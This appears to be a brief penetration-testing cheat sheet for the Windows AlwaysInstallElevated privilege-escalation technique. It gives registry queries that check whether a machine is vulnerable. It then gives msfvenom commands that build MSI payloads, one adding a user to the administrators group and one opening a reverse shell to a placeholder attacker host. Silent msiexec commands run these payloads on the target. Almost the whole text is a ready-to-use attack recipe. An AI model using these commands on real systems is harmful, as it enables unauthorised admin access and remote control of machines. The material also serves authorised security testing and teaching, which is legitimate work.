Always Install Elevated

Check with:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
From the output, notice that the "AlwaysInstallElevated" value is 1. It must be set to 1 in both HKCU and HKLM to be exploitable.

Steps:

# Generate payload to add user to admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
# OR
# Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi
# Run it on the target machine (reverse.msi needs a netcat listener):
msiexec /quiet /qn /i setup.msi
msiexec /quiet /qn /i reverse.msi